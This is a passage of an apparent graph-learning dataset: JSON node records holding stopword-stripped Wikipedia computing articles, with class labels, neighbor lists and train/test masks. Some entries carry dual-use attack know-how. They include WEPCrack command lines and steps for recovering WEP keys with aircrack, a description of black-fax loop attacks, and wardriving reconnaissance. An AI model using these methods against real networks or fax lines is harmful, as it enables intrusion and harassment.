    "text": "GEOM:geom geom main storage framework freebsd operating system available freebsd 5.0 higher provides standardized way access storage layers geom modular allows geom modules connect framework example geom_mirror module provide raid1 mirroring functionality system wide range modules already available new ones always active development various freebsd developers geom developed freebsd project poul-henning kamp nai labs security research division network associates inc. darpa/spawar contract n66001-01-c-8035 cboss part darpa chats research program name symbolizes impact disk geometry geom modular design modules 'stacked together form chain geom layers example top geom_mirror module encryption module added geom_eli provide mirrored encrypted volume module consumers providers provider 'source geom module often physical hard drive sometimes virtualized disk memory disk geom module turn provides 'output device geom modules called consumers use provider create chain modules connected source → geom module → output referred provider → geom module → consumer example geom_mirror module may use consumer following providers /dev/ada0 /dev/ada1 creates provider new device called /dev/mirror/gm0 end geom chain often filesystem applied actually use geom provider something useful provider created geom modules behaves like physical hard drive contain filesystems freebsd native unix file system ufs storage modules encryption compression modules filesystem modules virtualization",
    "neighbors": [
      7425,
      2180,
      1927,
      1801,
      10761,
      274,
      9625,
      1946,
      4636,
      2339,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      3248,
      7983,
      9009,
      11698,
      11573,
      1718,
      10422,
      9784,
      1465,
      5177,
      5819,
      3006,
      11459,
      1990,
      9927,
      1993,
      8266,
      8395,
      8909,
      5710,
      6864,
      7249,
      850,
      10455,
      6361,
      8410,
      6491,
      9306,
      607,
      3551,
      7521,
      1891,
      10851,
      998,
      4073,
      8816,
      2545,
      3058,
      6003,
      7027,
      9201,
      9844,
      9335,
      2424,
      1273,
      7802,
      11506,
      6014,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 2422,
    "label": 3,
    "text": "C.mmp:c.mmp c.mmp early mimd multiprocessor system developed carnegie mellon university william wulf 1971 notation c.mmp came pms notation bell newell cpu designated c variant noted dot notation mmp stood multi-mini-processor sixteen pdp-11 minicomputers used processing elements named compute modules system cm local memory 8k local set peripheral devices one challenges device available unique connected processor i/o system designed roy levin hid connectivity devices routed requests hosting processor processor went devices connected unibus became unavailable became problem overall system reliability processor 0 boot processor disk drives attached compute modules shared communication pathways since pdp-11 address space 16-bits additional address translation unit added expand address space 25 bits shared memory space unibus architecture provided 18 bits address two high-order bits used select one four relocation registers selected bank memory proper management relocation registers one challenges programming operating system kernel original c.mmp design used magnetic core memory lifetime higher performance dynamic ram became available system upgraded original processors pdp-11/20 processors final system five used remaining 11 pdp-11/40 processors modified additional writeable microcode space modifications machines designed built cmu 11/20 modifications custom changes motherboard pdp-11/40 implemented microcode separate proc-mod board designed intercepted certain instructions implemented protected operating system requirements example necessary operating system integrity stack pointer register never odd 11/20 accomplished clipping lead low-order bit stack register 11/40 access stack intercepted proc-mod board generated illegal data access trap low-order bit 1 operating system called hydra capability-based object-oriented multi-user operating system system resources represented objects protected capabilities among programming languages available system subset algol 68 language fact superset subset features supporting parallelism vastly improved make good use c.mmp operating system applications written language bliss-11 required cross-compilation pdp-10 algol-68 compiler ran native hydra operating system little assembly code used operating system overall system reliability depended 16 cpus running serious problems overall hardware reliability mtbf one processor 24 hours overall system reliability 16/24 hours 40 minutes overall system usually ran two six hours many failures due timing glitches many custom circuits added processors considerable effort expended getting hardware reliability improved processor noticeably failing partitioned would run diagnostics several hours passed first set diagnostics partitioned back i/o processor would run application code peripheral devices available continued run diagnostics passed several hours reinstated full member processor set similarly block memory one page detected faulty removed pool available pages otherwise notified operating system would ignore page thus operating system became early example fault-tolerant system able deal hardware problems would inevitably arise machine display ninth floor wean hall carnegie mellon university",
    "neighbors": [
      2179,
      7303,
      1611,
      7983,
      7480,
      5598
    ],
    "mask": "None"
  },
  {
    "node_id": 2423,
    "label": 4,
    "text": "Black_fax:black fax term black fax refers prank fax transmission consisting one pages entirely filled uniform black tone sender intention generally use much recipient fax ink toner thermal paper possible thus costing recipient money well denying recipient use machine similar computer-based denial service attacks made easier fax transmission protocols compress solid black image well short fax call produce many pages black faxes used harass large institutions government departments retaliate senders junk faxes merely simple pranks basic principle black fax extended form black fax attack case one sheets fed halfway sender fax machine taped end end forming endless loop cycles machine solid black used also images repeat endlessly receiver machine toner runs introduction computer-based facsimile systems combined integrated document imaging solutions major corporations means black faxes unlikely cause problems hand ability computer modems send faxes offers new avenues abuse program could used generate hundreds pages highly compressed pure black – huge volumes relevant-looking original non-repeating high-black-density junk effective far difficult counteract – send quickly target fax machine black faxes fax loops similar intention implementation lace cards",
    "neighbors": [
      2409,
      5979,
      855
    ],
    "mask": "Test"
  },
  {
    "node_id": 2424,
    "label": 2,
    "text": "OpenServer:openserver xinuos openserver previously sco unix sco open desktop sco odt closed source computer operating system developed santa cruz operation sco later acquired sco group owned xinuos early versions openserver based unix system v later openserver 10 based freebsd sco unix successor santa cruz operation variant microsoft xenix derived unix system v release 3.2 infusion xenix device drivers utilities sco unix system v/386 release 3.2.0 released 1989 commercial successor sco xenix base operating system include tcp/ip networking x window system graphics available optional extra-cost add-on packages shortly release bare os sco shipped integrated product name sco open desktop odt 1994 saw release sco mpx add-on smp package time completed merge xenix bsd sunos unix system v release 3 features unix system v release 4 sco unix remained based system v release 3 eventually added home-grown versions features release 4 1992 releases sco unix 3.2v4.0 open desktop 2.0 added support long file names symbolic links next major version openserver release 5.0.0 released 1995 added support elf executables dynamically linked shared objects made many kernel structures dynamic sco openserver 5 released 1995 would become sco primary product serve basis products like pizzanet first internet-based food delivery system done partnership pizza hut sco global access internet gateway server based open desktop lite due large installed base sco openserver 5 continues actively maintained sco major updates occurred recently april 2009 sco openserver 6 based merging unix system v release 4.2mp novell unixware 7 initially released sco group 2005 includes support large files increased memory multi-threaded kernel light-weight processes merged codebase referred unix system v release 5 svr5 used sco openserver 6 svr5 used major developer reseller sco openserver 6 contains unixware 7 svr5 kernel integrated sco openserver 5 application binary compatibility openserver 5 system administration openserver 5 user environments sco openserver primarily sold small medium business smb market widely used small offices point sale pos systems replicated sites backoffice database server deployments prominent larger sco openserver customers include mcdonald taco bell big tires pizza hut costco pharmacy nasdaq toronto stock exchange banco brasil many banks russia china railway system india sco purchased right distribute unixware system system v release 4 code base novell 1995 sco eventually able re-use code version unixware later releases openserver release 6 came primarily compilation system udi driver framework usb subsystem written end 1990s around 15,000 value-added resellers vars around world provided solutions customers sco unix systems sco announced august 2 2000 would sell server software services divisions well unixware openserver technologies caldera systems inc purchase completed may 2001 remaining part sco company tarantella division changed name tarantella inc. caldera systems became caldera international subsequently 2002 sco group sco group continued development maintenance openserver currently continue maintain obsoleted 5.0.x branch derived 3.2v5.0.x recent 5.0.7 june 22 2005 openserver 6.0 released codenamed legend first release new 6.0.x branch sco openserver 6 based unix system v release 5 svr5 kernel merged codebase unix system v release 4.2mp unixware 7 openserver 6.0 features multi-threading application support c c++ java applications posix interface openserver 6 features kernel-level threading found 5.0.x improvements openserver 5 include improved smp support support 32 processors support files terabyte partition larger network files supported nfsv3 better file system performance support 64 gb memory openserver 6.0 maintains backward-compatibility applications developed xenix 286 onwards sco group went bankrupt 2011 long series legal battles rights openserver well unixware acquired unxis 2011 later renamed xinuos june 2015 xinuos announced openserver 10 based freebsd operating system simultaneously xinuos introduced migration path existing customers using older os products december 2015 xinuos released definitive versions openserver 5 openserver 6 unixware 7 december 2017 xinuos released definitive 2018 versions openserver 6 unixware 7 october 2018 openserver 5 definitive 2018 released definitive 2018 releases commitment xinuos keep legacy os updated supported protecting applications customers need continue run definitive 2018 products contain major updates definitive releases soon announced updated development kit make easier compile current packages definitive 2018 products xinuos continued provide updates new flag ship os openserver 10 working version 12 release openserver 10 2019",
    "neighbors": [
      2560,
      7682,
      10761,
      6675,
      8725,
      1561,
      4636,
      7204,
      1071,
      7224,
      5177,
      9784,
      2120,
      6218,
      8266,
      5710,
      7249,
      2132,
      9306,
      607,
      11363,
      6760,
      1648,
      8816,
      9844,
      633,
      9343,
      640,
      2179,
      132,
      2180,
      6787,
      671,
      2212,
      7848,
      3241,
      684,
      3248,
      1718,
      5819,
      11459,
      10436,
      9927,
      8395,
      8909,
      6864,
      10455,
      6361,
      8410,
      6369,
      9444,
      5356,
      11501,
      11506,
      5363,
      4857,
      1273,
      2301,
      7425,
      5380,
      11013,
      1801,
      6412,
      274,
      787,
      5397,
      10518,
      1304,
      8991,
      7460,
      6438,
      10535,
      4908,
      6445,
      7983,
      9009,
      11573,
      823,
      7483,
      9027,
      2378,
      5969,
      850,
      8020,
      2903,
      11608,
      2395,
      6491,
      8539,
      7521,
      1891,
      7022,
      7027,
      5492,
      2421,
      2424,
      5506,
      1927,
      3976,
      11145,
      7566,
      9106,
      9625,
      1946,
      7067,
      414,
      3487,
      3488,
      6049,
      4012,
      5036,
      10156,
      11698,
      1971,
      2995,
      9141,
      1465,
      3006,
      9151,
      470,
      3551,
      6624,
      1508,
      998,
      4073,
      4076,
      3565,
      2545,
      3058,
      2035,
      9201,
      11256
    ],
    "mask": "None"
  },
  {
    "node_id": 2425,
    "label": 4,
    "text": "Industry_Connections_Security_Group:industry connections security group industry connections security group ieee icsg global group computer security entities past present members include anh labs avg avira eset f-secure k7 computing kaspersky labs marvell mcafee microsoft palo alto networks panda software safenet sophos symantec trend micro come together ieee pool experience resources combating systematic rapid rise computer security threats ieee icsg activities include",
    "neighbors": [
      704,
      7327,
      7362,
      131,
      7809,
      9537,
      9569,
      202,
      5586,
      9055,
      11577,
      1242,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 2426,
    "label": 4,
    "text": "Unidirectional_network:unidirectional network unidirectional network also referred unidirectional gateway data diode network appliance device allows data travel one direction data diodes found commonly high security environments defense serve connections two networks differing security classifications given rise industrial iot digitization technology found industrial control level facilities nuclear power plants power generation safety critical systems like railway networks years development use data diodes increased creating two variations data diodes commonly found high security military government environments becoming widely spread sectors like oil gas water/wastewater airplanes flight control units in-flight entertainment systems manufacturing cloud connectivity industrial iot new regulations increased demand increased capacity major technology vendors lowered cost core technology first data diodes developed governmental organizations eighties nineties organizations work confidential information making sure network secure highest priority primary solutions used organizations air gaps amount transferable data increased continuous real-time data stream became important organizations look automated solution search standardization increasing number organizations started look solution better fit activities commercial solutions created stable organizations succeeded given level security long-term support us utilities oil gas companies used data diodes several years regulators encouraged use protect equipment processes siss nuclear regulatory commission nrc mandates use data diodes many sectors addition electrical nuclear also use data diodes effectively europe regulators operators several safety-critical systems started recommending implementing regulations use unidirectional gateways 2013 working industrial control system cybersecurity directed french network information security agency anssi stated forbidden use firewalls connect class 3 network railway switching systems lower class network corporate network unidirectional technology permitted unidirectional network devices typically used guarantee information security protection critical digital systems industrial control systems cyber attacks use devices common high security environments defense serve connections two networks differing security classifications technology also used enforce one-way communications outbound critical digital systems untrusted networks connected internet physical nature unidirectional networks allows data pass one side network connection another way around low side untrusted network high side trusted network vice versa first case data high side network kept confidential users retain access data low side functionality attractive sensitive data stored network requires connectivity internet high side receive internet data low side data high side accessible internet-based intrusion second case safety-critical physical system made accessible online monitoring yet insulated internet-based attacks might seek cause physical damage cases connection remains unidirectional even low high network compromised security guarantees physical nature two general models using unidirectional network connections classical model purpose data diode prevent export classified data secure machine allowing import data insecure machine alternative model diode used allow export data protected machine preventing attacks machine described detail involves systems must secured remote/external attacks public networks publishing information networks example election management system used electronic voting must make election results available public time must immune attack model applicable variety critical infrastructure protection problems protection data network less important reliable control correct operation network example public living downstream dam needs up-to-date information outflow information critical input control system floodgates situation critical flow information secure control system public vice versa majority unidirectional network applications category defense defense contractors organizations traditionally applied air gaps keep classified data physically separate internet connection introduction unidirectional networks environments degree connectivity safely exist network classified data network internet connection bell-lapadula security model users computer system create data security level applies contexts hierarchy information classifications users security level share machine dedicated level machines connected data diodes bell-lapadula constraints rigidly enforced traditionally network provides dmz server access authorized user data vulnerable intrusions network however unidirectional gateways separating critical side ot network sensitive data open side business internet connectivity normally network organizations achieve best worlds enabling connectivity required assuring security holds true even network compromised traffic flow control physical nature simplest form unidirectional network modified fiber-optic network link send receive transceivers removed disconnected one direction link failure protection mechanisms disabled commercial products rely basic design add software functionality provides applications interface helps pass data across link sophisticated commercial offerings enable simultaneous one-way data transfer multiple protocols usually require bidirectional links owl cyber defense offered specialized government defense data diode solutions since late 1990s well solutions critical infrastructure commercial applications recently low-cost iot security data diode 2018 siemens mobility released industrial grade unidirectional gateway solution data diode data capture unit uses electromagnetic induction new chip design achieve eba safety assessment guaranteeing secure connectivity new existing safety critical systems safety integrity level sil 4 enable secure iot provide data analytics cloud hosted digital services us naval research laboratory nrl developed unidirectional network called network pump many ways similar dsto work except allows limited backchannel going high side low side transmission acknowledgments technology allows protocols used network introduces potential covert channel high- low-side compromised artificially delaying timing acknowledgment different implementations also differing levels third party certification accreditation cross domain guard intended use military context may require extensive third party certification accreditation data diode intended industrial use however may require third party certification accreditation depending application",
    "neighbors": [
      6337,
      4194,
      1350,
      8998,
      11470,
      3827,
      3924,
      2901,
      8694,
      9206,
      3930,
      5245,
      8574
    ],
    "mask": "Test"
  },
  {
    "node_id": 2427,
    "label": 3,
    "text": "Chung_Laung_Liu:chung laung liu professor chung laung dave liu 劉炯朗 c. l. liu ethnic chinese computer scientist born guangzhou spent childhood macau received b.sc degree taiwan master degree doctorate united states liu received b.sc degree 1956 national cheng kung university taiwan s.m e.e degrees 1960 sc d. degree 1962 massachusetts institute technology faculty massachusetts institute technology 1962–1972 university illinois urbana-champaign 1972–1998 associate provost 1995 1998 retired uiuc served president professor computer science national tsing hua university nthu hsinchu taiwan february 1998 february 2002 currently william mong honorary chair professor national tsing hua university visiting professor city university hong kong waseda university tokyo japan li k. t. honorary chair professor national central university since 2007 li kuo-ting forum professor national cheng kung university author co-author seven books monographs 180 technical papers research interests include computer-aided design vlsi circuits real-time systems computer-aided instruction combinatorial optimization discrete mathematics received ieee millennium medal ieee circuits systems society golden jubilee medal 2000 also received ieee computer society real time systems technical committee 1999 technical achievement award inaugural winner contributions area real time scheduling ieee circuits systems society 1998 technical achievement award contributions area computer aided design vlsi circuits received outstanding talents foundation award 1998 recipient 1994 ieee education medal also received taylor l. booth education award ieee computer society 1992 inaugural winner karl v. karlstrom education award association computing machinery 1989 member academia sinica fellow institute electrical electronics engineers fellow association computing machinery 2004 university macau awarded honorary doctorate",
    "neighbors": [
      1783,
      679
    ],
    "mask": "Test"
  },
  {
    "node_id": 2428,
    "label": 3,
    "text": "Tsinghua_University:tsinghua university tsinghua university abbreviated thu also romanized qinghua major research university beijing member elite c9 league chinese universities since establishment 1911 graduated numerous chinese leaders politics business academia culture reflecting motto self-discipline social commitment tsinghua university dedicated academic excellence advancing well-being chinese society global development along nearby peking university tsinghua perennially ranked one top academic institutions china asia worldwide recognized 14th best university 2017 times higher education world reputation rankings since 2015 tsinghua ranked best engineering computer science school world based factors including total research output performance tsinghua class institution double first class university plan tsinghua university established beijing tumultuous period national upheaval conflicts foreign powers culminated boxer rebellion anti-imperialist uprising foreign influence china suppression revolt foreign alliance including united states ruling qing dynasty required pay indemnities alliance members us secretary state john hay suggested us 30 million boxer indemnity allotted united states excessive much negotiation qing ambassador liang cheng us president theodore roosevelt obtained approval united states congress 1909 reduce indemnity payment us 10.8 million condition funds would used scholarships chinese students study united states using fund tsinghua college established beijing 29 april 1911 site former royal garden serve preparatory school students government planned send united states faculty members sciences recruited ymca united states graduates transferred directly american schools juniors upon graduation motto tsinghua self-discipline social commitment derived 1914 speech prominent scholar faculty member liang qichao quoted ching describe notion ideal gentleman 1925 school established four-year undergraduate program started research institute chinese studies 1928 tsinghua changed name national tsing hua university nthu second sino-japanese war many chinese universities forced evacuate campuses avoid japanese invasion 1937 tsinghua university along neighboring peking university nankai university merged form changsha temporary university changsha later became national southwestern associated university kunming yunnan province surrender occupying japanese forces end world war ii tsinghua university resumed operations beijing end chinese civil war 1949 china experienced communist revolution leading creation people republic china tsinghua university president mei yiqi along many professors fled taiwan retreating nationalist government established national tsing hua institute nuclear technology 1955 later became national tsing hua university taiwan institution independent distinct tsinghua university 1952 communist party china regrouped country higher education institutions attempt build soviet style system institution specialized certain field study social sciences natural sciences tsinghua university streamlined polytechnic institute focus engineering natural sciences 1966 1976 china experienced immense sociopolitical upheaval instability cultural revolution many university students walked classrooms tsinghua institutions went join red guards resulting complete shutdown university faculty persecuted otherwise unable teach 1978 cultural revolution ended university began take students re-emerge force chinese politics society 1980s tsinghua evolved beyond polytechnic model incorporated multidisciplinary system emphasizing collaboration distinct schools within broader university environment system several schools re-incorporated including tsinghua law school school economics management school sciences school life sciences school humanities social sciences school public policy management academy arts design 1996 school economics management established partnership sloan school management massachusetts institute technology one year later tsinghua mit began mba program known tsinghua-mit global mba 1997 tsinghua became first chinese university offer master laws llm program american law cooperative venture temple university beasley school law since resuming operations 1978 tsinghua university re-established among elite chinese universities affiliated c9 league selected participate double first class university plan national international university rankings consistently place tsinghua among best universities greater china asia worldwide tsinghua alumni include current general secretary chinese communist party paramount leader china xi jinping '79 graduated degree chemical engineering along cpc general secretary former paramount leader china hu jintao '64 graduated degree hydraulic engineering addition powerful alumni tsinghua reputation hosting globally prominent guest speakers international leaders bill clinton tony blair henry kissinger carlos ghosn park geun-hye henry paulson lectured university community 2018 tsinghua university consists 20 schools 58 university departments 41 research institutes 35 research centers 167 laboratories including 15 national key laboratories september 2006 peking union medical college renowned medical school renamed peking union medical college tsinghua university although tsinghua university technically separate institutions university operates tsinghua university press publishes academic journals textbooks scholarly works constituent colleges graduate professional schools institutes tsinghua university offers 51 bachelor degree programs 139 master degree programs 107 phd programs university consistently pursued innovation undergraduate graduate education partnerships foreign universities creation new colleges high-profile scholarship programs 2014 tsinghua established xinya college residential liberal arts college pilot project reform undergraduate education university modeled universities united states europe xinya combines general professional education liberal arts tradition featuring core curriculum chinese western literature civilization studies required courses physical education foreign languages furthermore tsinghua undergraduates must choose specific major upon entrance xinya students declare majors end freshman year enabling explore several different fields study tsinghua university also aggressively pursuing greater recognition global stage attracting funding talented international graduate students established 2013 us 300 million endowment modeled rhodes scholarship schwarzman scholars program annually selects funds 200 scholars enrolled one-year master degree programs public policy international relations engineering economics business scholars reside university campus schwarzman college residential college built specifically program 2016 tsinghua expenditures rmb 13.7 billion us 3.57 billion purchasing power parity largest budget university china tsinghua university engages extensive research offers 51 bachelor degree programs 139 master degree programs 107 doctoral programs 20 colleges 57 departments covering broad range subjects including science engineering arts literature social sciences law medicine along membership c9 league tsinghua university affiliations include association pacific rim universities group 50 leading asian american universities washington university st. louis ’ mcdonnell international scholars academy group 35 premier global universities association east asian research universities 17-member research collaboration network top regional institutions tsinghua associate member consortium linking universities science technology education research cluster admission tsinghua undergraduate graduate schools extremely competitive undergraduate admissions domestic students decided gaokao chinese national college entrance exam allows students list tsinghua university among preferred college choices selectivity varies province sheer number high school students applying college year resulted overall acceptance rates far lower 0.1 test takers tsinghua university commands high rate matriculation accepted undergraduates according report 2008 215 300 students placed within top 10 30 tested provinces regions chose tsinghua first choice school 21 30 top scorers province region chose university admission tsinghua graduate schools also competitive 16 mba applicants admitted year research tsinghua university mainly supported government funding national programs special projects areas science technology funding sources totals 20 billion yuan subsidizes 1,400 projects every year conducted university prospective increase state investment science technology research tsinghua projected receive financial support state year university hosts intellectual property summer institute cooperation franklin pierce law center concord new hampshire according domestic international rankings tsinghua university consistently recognized one top two universities mainland china along neighboring institution rival peking university example netbig chinese university rankings gave tsinghua 1st 2008 2009 2010 awarded 2nd china education center years internationally tsinghua regarded reputable chinese university 2017 times higher education world reputation rankings ranked 14th globally 2019 ranked 6th among universities around world scimago institutions rankings 2013 tsinghua also topped newly created regional qs brics university rankings 2015 us news world report best global university ranking ranked tsinghua 4th asia 59th globally sciences general 2018 cwts leiden ranking ranked tsinghua university 6th world time period 2013-2016 2014 ranked 23rd times higher education rankings subjects engineering technology historical strengths tsinghua since 2015 tsinghua university overtaken massachusetts institute technology top list best global universities engineering published u.s. news world report department electrical engineering tsinghua university plays pioneer role state power grid china research focus department include following areas department mathematical sciences dms established 1927 1952 tsinghua dms merged peking university department mathematical sciences 1979 renamed department applied mathematics renamed 1999 current title tsinghua dms three institutes present institute pure mathematics 27 faculty members institute applied mathematics probability statistics 27 faculty members institute computational mathematics operations research 20 faculty members currently 400 undergraduate students 200 graduate students department precision instrument called department precision instrument machine manufacturing 1960 separated department machine manufacturing independent department later 1971 renamed department precision instrument mission department precision instrument tsinghua university dean said supporting national development improving people ’ well-being research department precision instrument divided four main parts led four research institutes institute opto-electronic engineering institute instrument science technology engineering research center navigation technology center photonics electronics time department precision instrument three key laboratories state key laboratory tribology state key laboratory precision measurement technology instruments key laboratory high-accuracy inertial instrument system also two national engineering research centers national engineering research center optical disk cims national engineering research center institute opto-electronic engineering ioee established 1958 obtained chinese government authorization offer phd program 1981 approval build post-doctoral research site 1988 research ioee covers opto-electronic instruments precision metrology measurement modern optical information processing theory components binary optics birefringent frequency-splitting lasers several famous scientists work ioee including professor guofan jin academician chinese academy engineering professor kegong zhao formerly president chinese national institute metrology institute instrument science technology important institute state key laboratory precision measuring technology instrument science tsinghua university institute equipped advanced instruments facilities research included every major area modern instrument science technology 2012 institute produced 1500 publications 100 patents acquired many significant awards engineering research center navigation technology relatively young institute department precision instrument established 2000 intention pursue excellence research development field high-accuracy inertial instruments navigation technology well mems inertial sensor fields provide advanced training future scientists engineers field inertial technology research interests cover high-accuracy inertial instruments navigation technology mems inertial sensors systems precise electro-mechanical control systems application 2012 area center 2900 square meters including approximately 550 square meters clean rooms equipment instruments center worth 50 million rmb 7.56 million usd center photonics electronics works advanced laser photonic technology houses 200 square meters clean rooms modern laser instruments equipment research center covers solid-state laser technology fiber laser technology active optics technology laser detection technology center published lots papers also partnerships many domestic international companies research institutes authorization china state planning commission ministry education state key laboratory tribology sklt established november 1988 present director sklt professor yonggang meng present chair academic committee sklt professor jue zhong also member chinese academy engineering sklt one central laboratory 4 sub-laboratories awarded numerous awards including two national natural science awards two national invention awards one national award science technology progress two national excellent science book awards 25 awards ministries provinces china edmond e. bisson award 2003 stle 2008 pe publishing prize editor editorial board journal engineering tribology moreover china ministry education recognized sklt one creative groups 2005 national natural science foundation china recognized sklt one creative research groups 2007 established 1995 state key laboratory precision measurement technology instruments joint laboratory tsinghua university tianjin university national key laboratory two recognized national first-level key disciplines second-class disciplines research state key laboratory precision measurement technology instruments categorized four major parts laser optoelectric measurement technology sensing information measurement technology micro- nano- measurement fabrication technology quality control manufacturing technology key laboratory high-accuracy inertial instrument system established intention support research engineering research center navigation technology since establishment five prizes published large quantity papers currently two disciplines department precision instrument discipline instrumental science technology precision instrument mechanology discipline optical engineering six teaching laboratories centers serve significant roles undergraduate graduate education department precision instrument department provides 40 courses undergraduate level 25 courses graduate level 2012 284 undergraduates 152 postgraduates 219 doctoral students studying working department school life sciences first established 1926 name department biology botanist qian chongshu took first dean nationwide reorganization universities early 1950s department biology merged universities namely peking university etc. resulting vacancy field biological research tsinghua almost 30 years june 1984 decisions made reestablishment department biology department officially reopened september reestablishment department biology peking university institute biophysics chinese academy sciences many institutes well biologists provided valuable support help department changed name current name september 2009 2013 structural biologist foreign associate national academy sciences united states dr. yigong shi current dean school life sciences school currently 38 professors around 600 undergraduates including candidates tsinghua university peking union medical college joint md program 200 graduate students peking union medical college established 1917 rockefeller foundation modeled us medical education system tsinghua first established medical school 2001 2006 tsinghua medical school merged peking union medical college renaming peking union medical college tsinghua university school remains top ranked medical school general hospital china according cucas 2015 peking union medical college also medical school affiliated chinese academy medical sciences runs one competitive medical programs country accepting 90 students year 8-year md program students 8-year program spend 2.5 years tsinghua studying basic sciences moving onto peking union medical college complete last 5.5 years clinical medicine tsinghua school journalism communication tsjc established april 2002 predecessor communication studies department chinese language literature establishment coincides development media increasingly influencing world affairs time fast-growing globalization school research fields include international communication film television studies new media studies media operation management business journalism based comprehensive academic research journalism communication theories objective school bring full advantage tsinghua university comprehensive academic structure chinese international media construct first-rate discipline journalism communication studies cultivate talented professionals field explore advanced concepts journalism communication school also offers two-year graduate program international business journalism sponsored bloomberg l.p. international center journalists icfj trains talented students media professionals around globe financial media corporate communication school five research-oriented centers organize conduct academic research activities center international communications studies center new media studies center film television studies center media management studies center cultural industry studies legal studies tsinghua university dated back tsinghua college era 1911-1929 many students sent universities western countries legal studies graduating institutions columbia yale harvard tsinghua alumni played important role areas law diplomacy famous legal scholars tuan-sheng ch'ien yan shutang 燕树棠 wang huacheng 王化成 kung chuan hsiao 萧公权 pu xuefeng 浦薛凤 mei ju'ao 梅汝璈 xiang zhejun 向哲浚 diplomat tang yueliang 唐悦良 graduates tsinghua college went study abroad passing exams tsinghua college tsinghua university school law established 1929 tsinghua college renamed tsinghua university legal education tsinghua university time focused international affairs chinese legal studies courses political science economics could also found students curriculum japanese army invaded beijing 1937 school law developed greatly many chinese legal scholars graduated era including wang tieya 王铁崖 gong xiangrui 龚祥瑞 lou bangyan 楼邦彦 1952 response government policy turning tsinghua university engineering-focused university law school dismissed faculty appointed universities including peking university peking college political science law predecessor china university political science law 1995 formal school law tsinghua university yet courses law still taught tsinghua university september 8 1995 tsinghua university department law formally re-established april 25 1999 88th anniversary tsinghua university university formally changed department school law new law school inherited spirit old law school endeavored add international factors students curriculum due outstanding faculty members students tsinghua university school law risen become one leading law schools china since 2012 consistently ranked best second-best law school mainland china qs world university rankings graduate school shenzhen jointly founded tsinghua university shenzhen municipal government school directly affiliated tsinghua university beijing campus located university town shenzhen since 18 october 2003 graduate school shenzhen tsinghua university jointly founded tsinghua university shenzhen municipal government cultivating top level professionals carrying scientific technological innovations academic divisions tsinghua university 110 student associations covering five domains science technology physical training humanities arts public welfare name students association global affairs saga student association educational poverty alleviation saepa students performing arts club zijing volunteer service rural international student exchange rise students association science technology photography association foreign languages association association student international communication asic etc international students encouraged participate various extracurricular activities join student associations university fsao also organizes extracurricular activities international students including welcome party new students new year ’ party graduation party visits chinese cultural historical destinations sports competitions etc campus tsinghua university located northwest beijing haidian district designated universities academic institutes located former site qing dynasty royal gardens retains chinese-style landscaping well traditional buildings many buildings also western-style reflecting american influence history along rival neighbor peking university known throughout china wider world one beautiful campuses tsinghua university campus named one beautiful college campuses world panel architects campus designers forbes 2010 university asia list t. chuang 1914 graduate university illinois urbana–champaign helped design campus grounds tsinghua university influences american architectural style architectures university institute nuclear new energy technology separate campus northern suburb beijing tsinghua history museum covers construction area 5,060 m² collection old documents pictures artworks maps graphics videos music tells visitors history tsinghua university exhibition also pays tribute people contributed prestige development institution tsinghua university produced many notable graduates especially political sphere academic field industry tsinghua graduates political prominence disproportionately greater number graduates famous universities include former general secretary president hu jintao current party general secretary xi jinping former chairman national people congress wu bangguo former premier zhu rongji former first vice premier huang ju tsinghua also two nobel prize winners tsung-dao lee yang chen ning latter currently residing tsinghua campus term qinghua clique refers group communist chinese politicians graduated tsinghua university members fourth generation chinese leadership purported hold reformist hesitantly pro-democratic ideas number studied united states following graduation tsinghua said influenced reform ideals hu yaobang prc ascendance power began 2008 17th national congress cpc",
    "neighbors": [
      9601,
      3874,
      132,
      10116,
      11365,
      1930,
      11340,
      7893
    ],
    "mask": "None"
  },
  {
    "node_id": 2429,
    "label": 4,
    "text": "Network_encryption_cracking:network encryption cracking network encryption cracking breaching network encryptions e.g. wep wpa ... usually use special encryption cracking software may done range attacks active passive including injecting traffic decrypting traffic dictionary-based attacks mentioned several types attacks possible precisely injecting traffic means inserting forged encrypted messages network may done either key known generate new messages key known encrypted message plaintext message gathered comparison two programs able latter aireplay wepwedgie decryption often requires 2 tools 1 gathering packets another analysing packet determining key gathering packets may done tools wireshark prismdump cracking may done tools wepcrack airsnort aircrack weplab gathering packets often great amount required perform cracking depending attack used 5-16 million frames may required attack command however surprisingly simple commands inputted wepcrack perl \\progra~1\\wepcrack\\pcap-getiv.pl command generates log-file ivfile.log captured packet obtained wireshark prismdump packet least 5 million frames required perl \\progra~1\\wepcrack\\wepcrack\\.pl ivfile.log command asks wepcrack determine key log file aircrack another program even simpler use command need entered instead user asked type parameters click buttons first airodump started gather packets herefore channel mac-filter asked yet user need know per se instead 0 p may inputted respectively aircrack started file created airodump accessed 0 needs entered program determines key airsnort even simpler program completely interface-based attack simple brute-force attack however cracking encryption take several days weeks especially traffic low 4 users network cracking take least 2 weeks comparison tools noted may found security focus",
    "neighbors": [
      9640,
      7557
    ],
    "mask": "None"
  },
  {
    "node_id": 2430,
    "label": 4,
    "text": "Cracking_of_wireless_networks:cracking wireless networks cracking wireless network defeating security wireless local-area network back-jack wireless lan commonly used wireless lan wi-fi network wireless lans inherent security weaknesses wired networks exempt wireless cracking information network attack similar direct intrusion two frequent types vulnerabilities wireless lans caused poor configuration caused weak flawed security protocols 802.11 networks use data frames management frames control frames data frames convey real data similar ethernet management frames maintain network configuration connectivity control frames manage access ether prevent access points clients interfering ether information management frames helpful better understand programs reconnaissance wardriving common method wireless network reconnaissance well-equipped wardriver uses laptop computer wireless card antenna mounted car power inverter connected gps receiver way connect internet wirelessly purpose wardriving locate wireless network collect information configuration associated clients laptop computer wireless card must support mode called monitor rfmon netstumbler network discovery program windows free netstumbler become one popular programs wardriving wireless reconnaissance although disadvantage detected easily wireless intrusion detection systems actively probes network collect information netstumbler integrated support gps unit support netstumbler displays gps coordinate information next information discovered network useful finding specific networks sorted collected data latest release netstumbler 1 april 2004 work well 64-bit windows xp windows vista inssider wi-fi network scanner 32-bit 64-bit versions windows xp vista 7 windows 8 android free open source software uses current wireless card wireless usb adapter supports gps devices namely use nmea 2.3 higher graphical user interface shows mac address ssid signal strength hardware brand security network type nearby wi-fi networks also track strength signals show time graph kismet wireless network traffic analyser os x linux openbsd netbsd freebsd wireshark packet sniffer network traffic analyser run popular operating systems support capture wireless traffic limited free open source decoding analysing wireless traffic foremost function wireshark give results obtained programs wireshark requires sufficient knowledge network protocols obtain full analysis traffic however airmagnet laptop analyser airmagnet handheld analyser wireless network analysis tools made airmagnet company started handheld analyser suitable surveying 